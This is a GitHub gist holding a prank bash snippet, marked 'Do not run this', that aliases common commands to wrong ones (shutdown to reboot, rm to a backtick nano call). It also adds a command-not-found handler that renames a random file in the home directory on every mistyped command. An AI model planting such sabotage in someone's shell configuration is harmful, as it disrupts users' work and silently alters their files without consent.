Last active
November 6, 2015 19:27
-
-
Save polprog/579068848fa37a0e7dea to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Do not run this !!! | |
#IO operations | |
alias less='cat' | |
alias sed='awk' | |
#administration | |
alias apt-get='aptitude' | |
#file editing | |
alias emacs='vim' | |
#alias vim='emacs' | |
alias rm=`nano` | |
alias man='where' | |
alias shutdown='reboot' #this will break stuff | |
command_not_found_handle () { | |
clear; | |
cd ~; | |
FILE=`ls | shuf | head -n 1` | |
mv $FILE "$FILE.old" #Original backup script | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment